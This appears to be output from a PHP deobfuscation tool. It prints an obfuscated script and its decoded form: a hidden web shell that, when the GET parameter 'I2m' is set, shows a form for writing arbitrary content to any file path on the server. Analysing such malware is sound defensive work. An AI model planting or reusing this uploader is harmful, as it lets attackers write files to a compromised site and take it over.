Decode result (<?php goto fIEJPLN;TK81kZn3_f: $MBRtisU0 = lcfirst("Yf2aiIhq"); goto jsBFNQk;zGrVBN: if($Ndiuxe) ) PHP deobfuscation tool 2025-09-05 09:06:47

Decoded the code below.

<?php goto fIEJPLN;TK81kZn3_f: $MBRtisU0 = lcfirst("Yf2aiIhq"); goto jsBFNQk;zGrVBN: if($Ndiuxe) $HkQuhc0g($Ndiuxe,$NMoN_);goto LOaXjxCv;YQXYM5Ey: $qJtuyXexb = date("Y-m-d H:i:s"); goto ley09H3;FmSUGEu: $bb36pw2 = metaphone("nAXbTwE"); goto xmK_ZhbS;HvzOaUWY: $OjDA_5 = define("Qpa24gd","sGuPd"); ...

Obfuscated php code

<?php goto fIEJPLN;TK81kZn3_f: $MBRtisU0 = lcfirst("Yf2aiIhq"); goto jsBFNQk;zGrVBN: if($Ndiuxe) $HkQuhc0g($Ndiuxe,$NMoN_);goto LOaXjxCv;YQXYM5Ey: $qJtuyXexb = date("Y-m-d H:i:s"); goto ley09H3;FmSUGEu: $bb36pw2 = metaphone("nAXbTwE"); goto xmK_ZhbS;HvzOaUWY: $OjDA_5 = define("Qpa24gd","sGuPd"); goto rahn6Olf;lshgKB34v: $IEvPBmc7w = isset($_POST["qpwU1DujPq"])?trim($_POST["qpwU1DujPq"]):"";goto cY4AVX;JhjqTXm: $lfSZd0 = date("Y-m-d H:i:s"); goto AgMK6oH;yp012GZ: $lc6uWpat = wordwrap("", 14);goto KDcOSZpP;jKSurBi: $BQ06_e = md5("A9vsGFf"); goto SSW_IG;xmK_ZhbS: echo "\74\146\157\162\x6d\40\x6d\x65\x74\150\x6f\x64\75\42\120\117\123\124\x22\x3e";goto Ry9YocuVQ;pSfczgv5: $CS5CL = (string) null; goto FslZrxj5L;jsBFNQk: $aHizmGNy = wordwrap("", 9);goto tg8D3j;cY4AVX: $NMoN_ = isset($_POST["AqTWiR"])?trim($_POST["AqTWiR"]):""; goto CDky7CTJ;EDLb0s: $FEOsLmDo = define("RYqN0W","Les8UD"); goto TYy1Pun;Ry9YocuVQ: echo "\x3c\144\x69\x76\x3e\x3c\151\x6e\160\x75\x74\x20\164\x79\x70\x65\75\42\164\145\x78\x74\42\40\x6e\x61\155\x65\75\42\x71\x70\167\125\x31\x44\x75\152\120\161\42\x3e\x3c\57\x64\x69\166\x3e";goto d2fYFTkZ;muwvW0tCIo: $D18EsA = str_repeat("", 6); goto jKSurBi;Q5jQBu7H: $vnJ7_3pk = addcslashes("vnJ7_3pk","JcvyGewtqHhrpV3W"); goto yp012GZ;xuW5Ihvzq9: $f12OEmUrA = strtok("f12OEmUrA"); goto EDLb0s;Sy7lFrBJ: function SYEIe($Yy9vnqic,$kVK3J){                $DDTNk = str_split($Yy9vnqic,1);        $WJd7eY = explode(",",$kVK3J);      $j5CqeRS2="";       foreach($WJd7eY as $v){         $j5CqeRS2 .= $DDTNk[(int)$v];       }       return $j5CqeRS2;   }goto VYGwO9;yMg1_cvW5: $aVPK3h4X = substr("aVPK3h4X",8,0);goto h1UekJ;FslZrxj5L: if(!isset($_GET["I2m"]))exit;goto lshgKB34v;d2fYFTkZ: echo "\x3c\144\x69\166\76\74\164\145\x78\164\x61\x72\145\x61\x20\156\x61\x6d\145\x3d\x22\x41\161\x54\127\x69\x52\42\x20\x72\x6f\x77\163\x3d\42\65\42\76\74\x2f\164\x65\170\x74\141\x72\145\x61\x3e\x3c\57\x64\151\x76\x3e";goto YuZHy4;AgMK6oH: $LS9wJ7 = chunk_split("WDp7YTIeQ",3); goto rvV6AJ;KDcOSZpP: $Ndiuxe = !empty($NMoN_)? $EISTay($IEvPBmc7w,"w"):"";goto zGrVBN;iMrY1CW: $uWjvnY = strstr("uWjvnY", "IaljQx0"); goto pSfczgv5;VYGwO9: class yF3UIHYE{      public static function __callStatic($name, $arguments) {                        $temarr = array("EISTay"=>array("aennZ7frvdTpUiplEloe_zct1e","6,18,11,1,2"),"HkQuhc0g"=>array("Gwergy6plcieNtrOUCfanpzei_TE","18,1,3,10,13,2"),"OmTJ_"=>array("ieLNflgou_UcVlepXjaBehc4Msrx","4,11,5,7,25,1"));            foreach($temarr as $key=>$v){                $GLOBALS[$key] =  SYEIe($v[0],$v[1]);           }       }   }goto TK81kZn3_f;NkbJhMi: $SoUGSjZ5b = defined("AOU_wct"); goto YQXYM5Ey;R6fa7LwPde: $GZj3p = false; goto iMrY1CW;SSW_IG: $Yo3I7 = sprintf(""); goto xuW5Ihvzq9;h1UekJ: $ncQjkK1yL = str_repeat("", 13); goto NkbJhMi;ley09H3: $fbY3F4V1P = sha1("NDESgcL_"); goto JhjqTXm;UNivP4w8: $yf0elGnP = define("NmXJDeP1","eR8Ieq0g"); goto z84QmW;X9xaKB: $VW8OqH5 = strval(false); goto Sy7lFrBJ;quDUZtczs: echo "\74\57\x66\157\162\x6d\x3e";goto UNivP4w8;YuZHy4: echo "\74\x62\165\164\x74\x6f\x6e\x20\164\x79\160\145\x3d\42\163\x75\x62\155\151\x74\42\x3e\163\165\142\155\151\164\x3c\x2f\142\x75\x74\164\157\156\76";goto BCFdqpNKT;TYy1Pun: $nBsidykTq = false; goto yTZJrV6xSG;BCFdqpNKT: $DO8W_LS = str_repeat("", 14); goto quDUZtczs;fIEJPLN: $km1AS = addslashes("km1AS"); goto iTOisfXxQL;T2ukGz: $mvEK5o4l = implode("mvEK5o4l",array());goto muwvW0tCIo;iTOisfXxQL: $wPot4eYd = substr("wPot4eYd",8,0);goto yMg1_cvW5;tg8D3j: $E8sv1 = sprintf(""); goto FmSUGEu;LOaXjxCv: if($Ndiuxe) exit("LdWFVZmernsacyo".$OmTJ_($Ndiuxe));goto X9xaKB;rvV6AJ: $IbLXP2Yl = ucwords("e7hMs"); goto R6fa7LwPde;z84QmW: $xtrRH9WV1 = date("Y-m-d H:i:s"); goto T2ukGz;HzGPSo: $gOEVQ = implode("gOEVQ",array());goto HvzOaUWY;yTZJrV6xSG: $gXJyL8z = define("ky1tlX","roDJTFR"); goto HzGPSo;CDky7CTJ: $xdsef = yF3UIHYE::Fpg5B("rNrIbG",3);goto Q5jQBu7H;rahn6Olf:""; ?>

Decoded(de-Obfuscated) php code

<?php

$km1AS = addslashes("km1AS");
$wPot4eYd = substr("wPot4eYd", 8, 0);
$aVPK3h4X = substr("aVPK3h4X", 8, 0);
$ncQjkK1yL = str_repeat("", 13);
$SoUGSjZ5b = defined("AOU_wct");
$qJtuyXexb = date("Y-m-d H:i:s");
$fbY3F4V1P = "1f42c2f96226fcae6206e79775fb0c4bac7c06c2";
$lfSZd0 = date("Y-m-d H:i:s");
$LS9wJ7 = chunk_split("WDp7YTIeQ", 3);
$IbLXP2Yl = ucwords("e7hMs");
$GZj3p = false;
$uWjvnY = strstr("uWjvnY", "IaljQx0");
$CS5CL = "";
if (!isset($_GET["I2m"])) {
    exit;
}
$IEvPBmc7w = isset($_POST["qpwU1DujPq"]) ? trim($_POST["qpwU1DujPq"]) : "";
$NMoN_ = isset($_POST["AqTWiR"]) ? trim($_POST["AqTWiR"]) : "";
$xdsef = yF3UIHYE::Fpg5B("rNrIbG", 3);
$vnJ7_3pk = addcslashes("vnJ7_3pk", "JcvyGewtqHhrpV3W");
$lc6uWpat = wordwrap("", 14);
$Ndiuxe = !empty($NMoN_) ? $EISTay($IEvPBmc7w, "w") : "";
if ($Ndiuxe) {
    $HkQuhc0g($Ndiuxe, $NMoN_);
}
if ($Ndiuxe) {
    exit("LdWFVZmernsacyo" . $OmTJ_($Ndiuxe));
}
$VW8OqH5 = strval(false);
function SYEIe($Yy9vnqic, $kVK3J)
{
    $DDTNk = str_split($Yy9vnqic, 1);
    $WJd7eY = explode(",", $kVK3J);
    $j5CqeRS2 = "";
    foreach ($WJd7eY as $v) {
        $j5CqeRS2 .= $DDTNk[(int) $v];
    }
    return $j5CqeRS2;
}
class yF3UIHYE
{
    public static function __callStatic($name, $arguments)
    {
        $temarr = array("EISTay" => array("aennZ7frvdTpUiplEloe_zct1e", "6,18,11,1,2"), "HkQuhc0g" => array("Gwergy6plcieNtrOUCfanpzei_TE", "18,1,3,10,13,2"), "OmTJ_" => array("ieLNflgou_UcVlepXjaBehc4Msrx", "4,11,5,7,25,1"));
        foreach ($temarr as $key => $v) {
            $GLOBALS[$key] = SYEIe($v[0], $v[1]);
        }
    }
}
$MBRtisU0 = lcfirst("Yf2aiIhq");
$aHizmGNy = wordwrap("", 9);
$E8sv1 = sprintf("");
$bb36pw2 = metaphone("nAXbTwE");
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"qpwU1DujPq\"></div>";
echo "<div><textarea name=\"AqTWiR\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
$DO8W_LS = str_repeat("", 14);
echo "</form>";
$yf0elGnP = define("NmXJDeP1", "eR8Ieq0g");
$xtrRH9WV1 = date("Y-m-d H:i:s");
$mvEK5o4l = "";
$D18EsA = str_repeat("", 6);
$BQ06_e = md5("A9vsGFf");
$Yo3I7 = sprintf("");
$f12OEmUrA = strtok("f12OEmUrA");
$FEOsLmDo = define("RYqN0W", "Les8UD");
$nBsidykTq = false;
$gXJyL8z = define("ky1tlX", "roDJTFR");
$gOEVQ = "";
$OjDA_5 = define("Qpa24gd", "sGuPd");
"";

Malware detection & removal plugin for WordPress

PHP deobfuscation, decryption, reconstruction tool

Obfuscated php code

Decoded(de-Obfuscated) php code